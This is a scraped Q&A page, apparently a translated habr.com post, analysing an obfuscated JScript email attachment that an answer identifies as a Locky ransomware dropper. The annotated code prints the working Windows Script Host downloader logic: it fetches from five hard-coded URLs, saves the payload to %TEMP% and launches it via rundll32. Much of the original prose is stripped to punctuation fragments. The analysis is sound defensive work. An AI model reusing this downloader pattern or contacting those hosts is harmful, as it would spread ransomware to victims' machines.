Trying to decode a scam script result

Someone keeps sending me JS files, presumably trying to lure me (and others) into running them and compromising their systems.

Thing is, I have a Mac, and this code doesn't look like it could do anything on a Mac. As a JavaScript developer, I'm not even sure what it would do on a Windows machine.

The code is too big to post here, so I posted it on GitHub:

https://gist.github.com/anonymous/dfead201c8e5dc48f98548d0bdb7ac26

What does this code do?

I ran it in the sandbox and this resulted in a console error.


, ( ), 600 ;).

A decoded version of the script: http://pastebin.com/cFuijfFS

- :

// Candidate payload URLs, assembled at runtime from obfuscated string
// fragments (the fragment variables are defined earlier in the sample, not
// shown here).  The decoded values in the comment below are the answerer's
// reconstruction; treat them as indicators of compromise, not as links to visit.
var IGv7=[Yc+Hu1+Yq8+Jj+KFg2+Ka6+Hk+OHi6+ULs4+EBb, Tj4 + Dk7+Pc2+Hj8+As + YXv5+TIk0+Rj+Kb3+NZa2+DVq+Vx+KIi+Yh4 + XTc5+NHe3+Pv6+ATm5, Tj4 + Dk7+Gl+QLu+Pr+KIi+So+Af1+Nu + Zz+Kb + Zn1+Ik+Vy4, Yc+It+Nd+Ty+Lc+DFu+Lf4+LEa4+Zh1 + Kc+LSk+Tu6, Vg7 + Tp7+AUi+OPo + Oi+NGu8+DXl1+Px9 + Fa + Js9+KPm];
// var IGv7=["http://econopaginas.com/kudrd", "http://baer-afc2.homepage.t-online.de/4yhgvna", "http://jhengineering.szm.com/on9wjn", "http://otwayorchard.net/eo240k", "http://rejoincomp2.in/1tdqo6"]

// Even the method name ("CreateObject") and the ProgID are built from
// fragments, so neither appears as a literal in the file -- a simple
// signature-evasion trick.  WScript only exists in Windows Script Host
// (wscript.exe / cscript.exe), which is why this throws in a browser or Node.
var Xl3=WScript[Sk6 + STd1 + Jz + GNu0](Zn4 + ALt + Qs8 + UQw);
// Xl3=WScript["CreateObject"]("WScript.Shell");
// Lets say Xl3 == SHELL

var XWe=Xl3.ExpandEnvironmentStrings(ZFq + YMy6);
// var XWe=SHELL.ExpandEnvironmentStrings("%TEMP%/")
// %TEMP% normally resolves to the current user's temp directory, i.e. a
// user-writable location -- dropping the payload there needs no elevation.

var NQf6=XWe + Vm0 + LCo + Bp + Ty0;
// var NQf6=C:/TEMP/XfZn0ghPqqlucK
// (the base name is the answerer's example; the actual value is %TEMP% plus a
// generated name, which on a normal system is under the user's AppData, not C:\TEMP)

var Nt5=NQf6 + Aq4 + FQn5;
// var Nt5="C:/TEMP/XfZn0ghPqqlucK.dll"
// Same base name with a ".dll" extension (per the decoding above).

var Vu = Xl3.Environment(Cf8 + EMb);
// WshShell.Environment(...) returns an environment-variable *collection*, not a
// path: it is indexed like a function on the next line (Vu("PROCESSOR_ARCHITECTURE")).
// The earlier annotation "C:/system" for this line looks like a mis-decoding;
// the argument is presumably the collection type ("SYSTEM" or similar) -- unverified.

// PUb + YZg2 + BMc + Bs8 + DEa + HSu1 + Db4 == "PROCESSOR_ARCHITECTURE"
if (Vu(PUb + YZg2 + BMc + Bs8 + DEa + HSu1 + Db4).toLowerCase() == "amd64")
{
    // On 64-bit Windows deliberately pick the 32-bit rundll32 from SysWOW64,
    // presumably because the downloaded DLL is 32-bit.  Either way the loader
    // is rundll32.exe, a signed Microsoft binary -- wscript.exe spawning
    // rundll32 against a DLL in %TEMP% is a good detection signal.
    // (The actual launch is not in this excerpt.)
    var UFn4 = Xl3.ExpandEnvironmentStrings(OMi0);

    // var UFn4 = "%SystemRoot%\SysWOW64\rundll32.exe"
}
else
{
    // 32-bit (or non-amd64) Windows: use the native rundll32.
    var UFn4 = Xl3.ExpandEnvironmentStrings(DCx);
    // var UFn4 = "%SystemRoot%\system32\rundll32.exe"
}
... 
// Two HTTP-client ProgIDs; the loop below keeps the first one that
// instantiates, so the downloader still works if either COM class is missing.
var SPz0=[WQp1 + WCl1 + TYr1 + Np, Wd + CMz6 + Ey7 + GXj + Kk2 + Fb8 + POy1];
// SPz0=["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"]

// Try to create the XMLHTTP object
// ETi8 + Fp presumably decodes to "length" (it is used the same way on the
// URL array later in the script).
for (var Lp9=0; Lp9 < SPz0[ETi8 + Fp]; Lp9++)
{
    try 
    {
        // WScript["CreateObject"](SPz0[Lp9]) -- same obfuscated method name as above.
        var MBi0=WScript[Sk6 + STd1 + Jz + GNu0](SPz0[Lp9]);
        // First working client wins.
        break;
    }
    catch (e)
    {
        // ProgID not registered on this machine: try the next one.
        continue;
    }
};

// Later holds the path of a ".txt" marker next to the dropped DLL (see the loop below).
var OPr3 = "";
// FIj2 + HOf + LBa1 + ZJo + MPr8 + Az + DZx6 == "Scripting.FileSystemObject"
// FileSystemObject is used below to test for the dropped DLL.  Like WScript,
// ActiveXObject exists only in Windows Script Host / legacy IE; in any other
// JS engine this line raises a ReferenceError, which is presumably the
// "console error" the question mentions.
var fso = new ActiveXObject(FIj2 + HOf + LBa1 + ZJo + MPr8 + Az + DZx6);


// Seed the sample's own PRNG (uheprng is defined elsewhere in the script and
// not shown here) from Math.random(); it is later called with the URL-array
// length to pick which of the hard-coded URLs is tried first.
var MTm6 = uheprng(Math.random().toString());
// Flag meaning "a request still has to be sent"; presumably cleared once a
// download succeeds (the rest of the loop is cut off in this excerpt).
var ENa6=1;
do
{
    // Check ACTIVEXOBJECT_FileSystemObject[FileExists](dll file from before)
    if (fso[DQq + Js + Va + Vn](Nt5))
    {
        var Em = fso.GetFile(Nt5);
        var DAb4 = Em.ShortPath;
        OPr3 = DAb4+ZYz;

        // check if the same dll file with ".txt" extension exists
        if (fso[DQq + Js + Va + Vn](OPr3)) {
            // run quite()
            this[Dv + Dx + Go7][Jh + Nz3](824 - 824);
        }
    }

    var HFw3 = MTm6(IGv7[ETi8 + Fp]);

    try
    {
        if (1== ENa6)
        {
            // Do a GET request to the url "http://jhengineering.szm.com/on9wjn"
            MBi0[NOc6](YRk1 + XWj, IGv7[HFw3++ % IGv7[ETi8 + Fp]], false);
            MBi0[BBw + Co]();
        }

        if (MBi0.readystate < 4) 
        {
            // WScript["Sleep"](100);
            WScript[SJl + Hj](100);

            continue;
        }


        var Nf=WScript[Sk6 + STd1 + Jz + GNu0](YPt6+CXb+Tv0+Da1 + Ng2);
        // var Nf=WScript["CreateObject"]("ADODB.Stream")


        // ADOBE_SCRIPT[open]()
        Nf[NOc6]();

        // ADOBE_SCRIPT[type] = 1
        Nf[Aj9]=Yz; 

        // ADOBE_SCRIPT[write](content from the XMLHTTPRequest we just did)
        Nf[Vr3](MBi0[Nb + Re + HKj + Zk]);

        // Set position of the adodb.stream to 0
        Nf[Hz + QWh5 + VSo5]=0;

        // Save the content to the file NQf6 (the file in c:/temp)
        Nf[WGa + Yh + OAk](NQf6, IDz0);

        // close the file
        Nf[Cz + FLv2]();

, :)


It uses WScript (Windows Script Host), so it is a Windows-only script; it only does anything on Windows. :P

2 , eval, - , , , var Q1, eval console.log. js, , , , . , jts-prettifier, , , LOL, .

, , xD

: , jsfiddle , - ..

Edit2:

!

https://jsfiddle.net/3sn6o9o9/

.

. js, , , !


Summary: the script downloads a DLL from one of the hard-coded URLs (the starting index is picked with an XOR-based PRNG), saves it under %TEMP% and runs it with rundll32 (the 32-bit one on x64). The answer identifies the DLL as the Locky ransomware.


Source: https://habr.com/ru/post/1652666/


All Articles